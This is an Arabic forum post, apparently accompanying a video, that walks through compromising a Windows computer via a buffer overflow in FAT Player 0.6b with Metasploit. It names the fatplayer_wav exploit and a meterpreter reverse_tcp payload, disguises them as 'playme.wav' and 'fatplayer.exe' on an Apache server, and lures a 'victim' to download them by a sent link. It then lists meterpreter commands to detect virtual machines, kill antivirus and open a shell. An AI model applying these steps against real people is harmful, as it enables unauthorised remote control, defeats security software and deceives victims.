هده طريقة لإختراق الحواسيب عن طريق ترغرة ال Buffer overviewالمتواجدة في ال
FAT player
لرؤية الشرح بالصورة و الصوت مباشرة هنا
http://blip.tv/jac0bn3t/metasploit-fatplayer-buffer-overview-5376533
للتحميل الشرح هنا
http://blip.tv/file/get/Jac0bn3t-met...verview350.mp4
كن سخيا و إ قرأ هدا الموضوع
ما قمت باستخدامه :
Metasploit
OS:backtrack 5 and Win SP3
Camtasia studio recorder and editor
Fat player
الشرح:
قمت بإعداد PAYLOAD
على صيغة .WAV
exploit:windows/fileformat/fatplayer_wav
PAYLOAD :windows/meterpreter/reverse_tcp
كيف قمنا بصنع ال PAYLOAD
الشرح في الفيديو من الدقيقة 1:00 إلى 2:15
تم وضعناها أى ال PAYLOADفي /root/backdoor.wav
حملنا
fatplayer 0.6bالمتغورة بال Buffer Overview
ووضعناها أيضا في ال /root/fatplayer_win32
بعد دالك قمنا بتغير أسماء
FAYplayer_win32=====>fatplayer.exe
backdoor.wav=======>playme.wav
حولناهم من / rootإلى /var/www
سوف تتسألون لمادا الى /var/www
لكي تصبح قابلة للتحميل من اي حاسوب
بعد فتح ال بورت 80 عن تطريق ال
service apache2 start
ارسلت للضحية رسالة فيها رابط
168.192.*.*/fatplayer.exe
و
168.192.*.*/playme.wav
بعد قراءة الضحية للرسالة و تحميل fatplayer.exe and playme.wav
و تشعيل الموسيقا سوف احصل على meterpreter
و سأبدأ ببعض Meterpreter scripting
run checkvm للمعرفة هل هو System وهمي
run killavللقتل عمل ال antivirus
تم shell-i للحصول على CMD or bash
الموسيقا :
savage garder
animal song
santa monica